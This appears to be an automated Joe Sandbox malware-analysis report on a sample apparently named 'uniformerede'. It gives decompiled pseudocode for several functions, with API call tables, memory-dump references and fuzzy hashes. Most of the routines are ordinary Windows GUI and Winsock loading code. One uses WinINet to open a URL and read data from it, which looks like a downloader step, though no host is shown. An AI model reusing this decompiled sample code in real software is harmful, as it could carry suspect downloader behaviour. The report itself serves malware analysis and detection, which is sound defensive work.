                                                                                                                                                                                                                            0x00475013
                                                                                                                                                                                                                            0x004750c4
                                                                                                                                                                                                                            0x004750c6
                                                                                                                                                                                                                            0x004750c9
                                                                                                                                                                                                                            0x004750cc
                                                                                                                                                                                                                            0x004750da
                                                                                                                                                                                                                            0x00475019
                                                                                                                                                                                                                            0x00475035
                                                                                                                                                                                                                            0x0047503c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00475042
                                                                                                                                                                                                                            0x00475044
                                                                                                                                                                                                                            0x00475045
                                                                                                                                                                                                                            0x0047504a
                                                                                                                                                                                                                            0x0047504d
                                                                                                                                                                                                                            0x00475050
                                                                                                                                                                                                                            0x00475050
                                                                                                                                                                                                                            0x0047506b
                                                                                                                                                                                                                            0x00475074
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00475079
                                                                                                                                                                                                                            0x00475092
                                                                                                                                                                                                                            0x0047509f
                                                                                                                                                                                                                            0x0047509f
                                                                                                                                                                                                                            0x004750a8
                                                                                                                                                                                                                            0x004750ab
                                                                                                                                                                                                                            0x004750ae
                                                                                                                                                                                                                            0x004750bc
                                                                                                                                                                                                                            0x004750bc
                                                                                                                                                                                                                            0x0047503c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • InternetOpenA.WININET(MyApp,00000000,00000000,00000000,00000000), ref: 00474FF9
                                                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00475030
                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,00000400), ref: 0047506B
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004750B7
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004750D5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                                                            • String ID: MyApp
                                                                                                                                                                                                                            • API String ID: 3121278467-2115267534
                                                                                                                                                                                                                            • Opcode ID: 1fccfd11a45c6cc4102efae17bab0ce8ab5d7e7740f69415ac293a44f6d9b99d
                                                                                                                                                                                                                            • Instruction ID: 49772c5e95778878b0e4af45138c7482376825189897ce4c7807679e07b59e25
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1fccfd11a45c6cc4102efae17bab0ce8ab5d7e7740f69415ac293a44f6d9b99d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C31A7B1A04748ABE711DBA5DC12BDA77BCE748704F6184BAB704E76C0D6BC5940CA5C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00448DC4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 56%
                                                                                                                                                                                                                            			E00448DC4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t9;
				void* _t11;
				intOrPtr _t17;
				void* _t28;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t41;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t46;

				_t45 = _t46;
				_push(__ebx);
				_t43 = __edx;
				_t28 = __eax;
				if( *0x49eba0 == 0) {
					 *0x49eba0 = E0040D9DC("comctl32.dll", __eax);
					if( *0x49eba0 >= 0x60000) {
						_t41 = GetModuleHandleA("comctl32.dll");
						if(_t41 != 0) {
							 *0x49eba4 = GetProcAddress(_t41, "ImageList_WriteEx");
						}
					}
				}
				_v8 = E00422634(_t43, 1, 0);
				_push(_t45);
				_push(0x448ebe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				if( *0x49eba4 == 0) {
					_t9 = _v8;
					if(_t9 != 0) {
						_t9 = _t9 - 0xffffffec;
					}
					_push(_t9);
					_t11 = E00447D0C(_t28);
					_push(_t11);
					L0042C4AC();
					if(_t11 == 0) {
						_t33 =  *0x49d9c8; // 0x422f10
						E0040D200(_t33, 1);
						E00404378();
					}
				} else {
					_t17 = _v8;
					if(_t17 != 0) {
						_t17 = _t17 - 0xffffffec;
					}
					_push(_t17);
					_push(1);
					_push(E00447D0C(_t28));
					if( *0x49eba4() != 0) {
						_t34 =  *0x49d9c8; // 0x422f10
						E0040D200(_t34, 1);
						E00404378();
					}
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x448ec5);
				return E00403BEC(_v8);
			}
















                                                                                                                                                                                                                            0x00448dc5
                                                                                                                                                                                                                            0x00448dc8
                                                                                                                                                                                                                            0x00448dcb
                                                                                                                                                                                                                            0x00448dcd
                                                                                                                                                                                                                            0x00448dd6
                                                                                                                                                                                                                            0x00448de2
                                                                                                                                                                                                                            0x00448df1
                                                                                                                                                                                                                            0x00448dfd
                                                                                                                                                                                                                            0x00448e01
                                                                                                                                                                                                                            0x00448e0e
                                                                                                                                                                                                                            0x00448e0e
                                                                                                                                                                                                                            0x00448e01
                                                                                                                                                                                                                            0x00448df1
                                                                                                                                                                                                                            0x00448e23
                                                                                                                                                                                                                            0x00448e28
                                                                                                                                                                                                                            0x00448e29
                                                                                                                                                                                                                            0x00448e2e
                                                                                                                                                                                                                            0x00448e31
                                                                                                                                                                                                                            0x00448e3b
                                                                                                                                                                                                                            0x00448e75
                                                                                                                                                                                                                            0x00448e7a
                                                                                                                                                                                                                            0x00448e7c
                                                                                                                                                                                                                            0x00448e7c
                                                                                                                                                                                                                            0x00448e7f
                                                                                                                                                                                                                            0x00448e82
                                                                                                                                                                                                                            0x00448e87
                                                                                                                                                                                                                            0x00448e88
                                                                                                                                                                                                                            0x00448e8f
                                                                                                                                                                                                                            0x00448e91
                                                                                                                                                                                                                            0x00448e9e
                                                                                                                                                                                                                            0x00448ea3
                                                                                                                                                                                                                            0x00448ea3
                                                                                                                                                                                                                            0x00448e3d
                                                                                                                                                                                                                            0x00448e3d
                                                                                                                                                                                                                            0x00448e42
                                                                                                                                                                                                                            0x00448e44
                                                                                                                                                                                                                            0x00448e44
                                                                                                                                                                                                                            0x00448e47
                                                                                                                                                                                                                            0x00448e48
                                                                                                                                                                                                                            0x00448e51
                                                                                                                                                                                                                            0x00448e5a
                                                                                                                                                                                                                            0x00448e5c
                                                                                                                                                                                                                            0x00448e69
                                                                                                                                                                                                                            0x00448e6e
                                                                                                                                                                                                                            0x00448e6e
                                                                                                                                                                                                                            0x00448e5a
                                                                                                                                                                                                                            0x00448eaa
                                                                                                                                                                                                                            0x00448ead
                                                                                                                                                                                                                            0x00448eb0
                                                                                                                                                                                                                            0x00448ebd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0040D9DC: 73AC14E0.VERSION(00000000,?,00000000,0040DAB2), ref: 0040DA1E
                                                                                                                                                                                                                              • Part of subcall function 0040D9DC: 73AC14C0.VERSION(00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA53
                                                                                                                                                                                                                              • Part of subcall function 0040D9DC: 73AC1500.VERSION(?,0040DAC4,?,?,00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA6D
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00448DF8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00448E09
                                                                                                                                                                                                                            • 73751DE0.COMCTL32(00000000,?,00000000,00448EBE), ref: 00448E88
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 73751AddressC1500HandleModuleProc
                                                                                                                                                                                                                            • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                                                                                                                                                                                            • API String ID: 3699963180-3125200627
                                                                                                                                                                                                                            • Opcode ID: 07ee34b8be0565e7f1cf5a0c4b1dbc2c1134b74eaf3696c36e383b944ea21b8f
                                                                                                                                                                                                                            • Instruction ID: 78786ebc40bd40dec1c5389fa6359cb69700be1fbc3bb7ccab78b7c5a69fbc81
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07ee34b8be0565e7f1cf5a0c4b1dbc2c1134b74eaf3696c36e383b944ea21b8f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3214870A04201ABE710EB7ADD56B6F36A8AB55708B60057FF805E72A2DF7DAC00D61D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042C900 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 47%
                                                                                                                                                                                                                            			E0042C900(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92d != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x49e914; // 0x42c900
					 *0x49e914 = E0042C4FC(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x49e914(_t27, _t29);
				}
				return _t24;
			}














                                                                                                                                                                                                                            0x0042c909
                                                                                                                                                                                                                            0x0042c90c
                                                                                                                                                                                                                            0x0042c916
                                                                                                                                                                                                                            0x0042c93b
                                                                                                                                                                                                                            0x0042c943
                                                                                                                                                                                                                            0x0042c963
                                                                                                                                                                                                                            0x0042c968
                                                                                                                                                                                                                            0x0042c973
                                                                                                                                                                                                                            0x0042c97e
                                                                                                                                                                                                                            0x0042c988
                                                                                                                                                                                                                            0x0042c989
                                                                                                                                                                                                                            0x0042c98a
                                                                                                                                                                                                                            0x0042c98b
                                                                                                                                                                                                                            0x0042c98c
                                                                                                                                                                                                                            0x0042c98d
                                                                                                                                                                                                                            0x0042c997
                                                                                                                                                                                                                            0x0042c999
                                                                                                                                                                                                                            0x0042c9a1
                                                                                                                                                                                                                            0x0042c9a2
                                                                                                                                                                                                                            0x0042c9a2
                                                                                                                                                                                                                            0x0042c9a7
                                                                                                                                                                                                                            0x0042c9a7
                                                                                                                                                                                                                            0x0042c918
                                                                                                                                                                                                                            0x0042c91d
                                                                                                                                                                                                                            0x0042c92a
                                                                                                                                                                                                                            0x0042c937
                                                                                                                                                                                                                            0x0042c937
                                                                                                                                                                                                                            0x0042c9b1

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C958
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C96D
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C978
                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C9A2
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                                                                                                            • String ID: DISPLAY$GetMonitorInfoA
                                                                                                                                                                                                                            • API String ID: 2545840971-1370492664
                                                                                                                                                                                                                            • Opcode ID: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                                                                                                                                                                                            • Instruction ID: f52c56f8859c3bc03712ace229276911b675d95da7c00cdafe0d7f24be773c7c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E11B4F17017249FD720DF61AC84BABB7A8FB4A310F40493FE94597250D375A940C7AA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042C9D4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 47%
                                                                                                                                                                                                                            			E0042C9D4(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92e != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x49e918; // 0x42c9d4
					 *0x49e918 = E0042C4FC(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x49e918(_t27, _t29);
				}
				return _t24;
			}














                                                                                                                                                                                                                            0x0042c9dd
                                                                                                                                                                                                                            0x0042c9e0
                                                                                                                                                                                                                            0x0042c9ea
                                                                                                                                                                                                                            0x0042ca0f
                                                                                                                                                                                                                            0x0042ca17
                                                                                                                                                                                                                            0x0042ca37
                                                                                                                                                                                                                            0x0042ca3c
                                                                                                                                                                                                                            0x0042ca47
                                                                                                                                                                                                                            0x0042ca52
                                                                                                                                                                                                                            0x0042ca5c
                                                                                                                                                                                                                            0x0042ca5d
                                                                                                                                                                                                                            0x0042ca5e
                                                                                                                                                                                                                            0x0042ca5f
                                                                                                                                                                                                                            0x0042ca60
                                                                                                                                                                                                                            0x0042ca61
                                                                                                                                                                                                                            0x0042ca6b
                                                                                                                                                                                                                            0x0042ca6d
                                                                                                                                                                                                                            0x0042ca75
                                                                                                                                                                                                                            0x0042ca76
                                                                                                                                                                                                                            0x0042ca76
                                                                                                                                                                                                                            0x0042ca7b
                                                                                                                                                                                                                            0x0042ca7b
                                                                                                                                                                                                                            0x0042c9ec
                                                                                                                                                                                                                            0x0042c9f1
                                                                                                                                                                                                                            0x0042c9fe
                                                                                                                                                                                                                            0x0042ca0b
                                                                                                                                                                                                                            0x0042ca0b
                                                                                                                                                                                                                            0x0042ca85

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042CA2C
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CA41
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CA4C
                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042CA76
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                                                                                                            • String ID: DISPLAY$GetMonitorInfoW
                                                                                                                                                                                                                            • API String ID: 2545840971-2774842281
                                                                                                                                                                                                                            • Opcode ID: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                                                                                                                                                                                            • Instruction ID: da6544c83ea616b7bbcbecc7cac92abfbfd15a320570470bed168d46318f2a96
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D11103B1B413289FD760CF61AC84BAFB7A8FB06310F40493BE85597290D375A944CBA8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00428F38 Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E00428F38(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E004267F4(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L4;
					} else {
						_push(0);
						L00407638();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L004072E0();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x428fe7);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x428fee);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L00407888();
						return _t31;
					}
				}
			}

















                                                                                                                                                                                                                            0x00428f38
                                                                                                                                                                                                                            0x00428f39
                                                                                                                                                                                                                            0x00428f3b
                                                                                                                                                                                                                            0x00428f43
                                                                                                                                                                                                                            0x00428f46
                                                                                                                                                                                                                            0x00428f4a
                                                                                                                                                                                                                            0x00428fee
                                                                                                                                                                                                                            0x00428ff3
                                                                                                                                                                                                                            0x00428f5b
                                                                                                                                                                                                                            0x00428f69
                                                                                                                                                                                                                            0x00428f6e
                                                                                                                                                                                                                            0x00428f72
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00428f74
                                                                                                                                                                                                                            0x00428f74
                                                                                                                                                                                                                            0x00428f76
                                                                                                                                                                                                                            0x00428f7b
                                                                                                                                                                                                                            0x00428f7e
                                                                                                                                                                                                                            0x00428f81
                                                                                                                                                                                                                            0x00428f82
                                                                                                                                                                                                                            0x00428f87
                                                                                                                                                                                                                            0x00428f94
                                                                                                                                                                                                                            0x00428f99
                                                                                                                                                                                                                            0x00428f9a
                                                                                                                                                                                                                            0x00428f9f
                                                                                                                                                                                                                            0x00428fa2
                                                                                                                                                                                                                            0x00428fb3
                                                                                                                                                                                                                            0x00428fba
                                                                                                                                                                                                                            0x00428fbd
                                                                                                                                                                                                                            0x00428fc0
                                                                                                                                                                                                                            0x00428fcd
                                                                                                                                                                                                                            0x00428fd6
                                                                                                                                                                                                                            0x00428fdb
                                                                                                                                                                                                                            0x00428fde
                                                                                                                                                                                                                            0x00428fdf
                                                                                                                                                                                                                            0x00428fe1
                                                                                                                                                                                                                            0x00428fe6
                                                                                                                                                                                                                            0x00428fe6
                                                                                                                                                                                                                            0x00428f72

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004267F4: GetObjectA.GDI32(?,00000004), ref: 0042680B
                                                                                                                                                                                                                              • Part of subcall function 004267F4: 73C9AEA0.GDI32(?,00000000,?,?,?,00000004,?,000000FF,?,?,?,00428F6E), ref: 0042682E
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 00428F76
                                                                                                                                                                                                                            • 73C9A590.GDI32(?,00000000), ref: 00428F82
                                                                                                                                                                                                                            • SelectObject.GDI32(?), ref: 00428F8F
                                                                                                                                                                                                                            • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FB3
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00428FCD
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00428FD6
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,?,?,?,00428FEE,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FE1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$Select$A590B380ColorDeleteTable
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 980243606-0
                                                                                                                                                                                                                            • Opcode ID: a3d5f77fbad06867d513725d5eef4056ba0587fdc086a60eec88e5d63d0f1340
                                                                                                                                                                                                                            • Instruction ID: 4e07099c4c205c436fb256934ce996c76079a9fb80c20dbc0557a77875d025fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3d5f77fbad06867d513725d5eef4056ba0587fdc086a60eec88e5d63d0f1340
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8116671E052186BDB10EBE9DC41EAEB7BCEB08704F8144BAF904E7281DA789D40C765
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047B898 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 26%
                                                                                                                                                                                                                            			E0047B898(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				struct HINSTANCE__* _t19;
				intOrPtr _t26;
				void* _t30;
				intOrPtr _t42;
				void* _t51;

				_push(__ebx);
				_v8 = 0;
				_v12 = 0;
				_push(_t51);
				_push(0x47b965);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				if( *0x49c9fc == 0) {
					 *0x49c9fc = LoadLibraryA("WS2_32.DLL");
					if( *0x49c9fc == 0) {
						_push(GetLastError());
						_push( &_v8);
						_t26 =  *0x49d8e0; // 0x47a5e4
						E00406A70(_t26,  &_v12);
						_push(_v12);
						_v20 = "WS2_32.DLL";
						_v16 = 0xb;
						_pop(_t30);
						E0040A664(_t30, 0,  &_v20);
						E0047A93C(__ebx, _v8, 1, __edi, __esi);
						E00404378();
					}
					_t19 =  *0x49c9fc; // 0x0
					 *0x49ee80 = GetProcAddress(_t19, "WSAStartup");
					 *0x49ee80(_a4, _a8);
				}
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(0x47b96c);
				return E004049E4( &_v12, 2);
			}












                                                                                                                                                                                                                            0x0047b89e
                                                                                                                                                                                                                            0x0047b8a1
                                                                                                                                                                                                                            0x0047b8a4
                                                                                                                                                                                                                            0x0047b8a9
                                                                                                                                                                                                                            0x0047b8aa
                                                                                                                                                                                                                            0x0047b8af
                                                                                                                                                                                                                            0x0047b8b2
                                                                                                                                                                                                                            0x0047b8bc
                                                                                                                                                                                                                            0x0047b8cc
                                                                                                                                                                                                                            0x0047b8d8
                                                                                                                                                                                                                            0x0047b8df
                                                                                                                                                                                                                            0x0047b8e3
                                                                                                                                                                                                                            0x0047b8e7
                                                                                                                                                                                                                            0x0047b8ec
                                                                                                                                                                                                                            0x0047b8f4
                                                                                                                                                                                                                            0x0047b8fa
                                                                                                                                                                                                                            0x0047b8fd
                                                                                                                                                                                                                            0x0047b906
                                                                                                                                                                                                                            0x0047b907
                                                                                                                                                                                                                            0x0047b916
                                                                                                                                                                                                                            0x0047b91b
                                                                                                                                                                                                                            0x0047b91b
                                                                                                                                                                                                                            0x0047b925
                                                                                                                                                                                                                            0x0047b930
                                                                                                                                                                                                                            0x0047b93e
                                                                                                                                                                                                                            0x0047b944
                                                                                                                                                                                                                            0x0047b94c
                                                                                                                                                                                                                            0x0047b94f
                                                                                                                                                                                                                            0x0047b952
                                                                                                                                                                                                                            0x0047b964

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(WS2_32.DLL,00000000,0047B965), ref: 0047B8C7
                                                                                                                                                                                                                            • GetLastError.KERNEL32(WS2_32.DLL,00000000,0047B965), ref: 0047B8DA
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0047B92B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
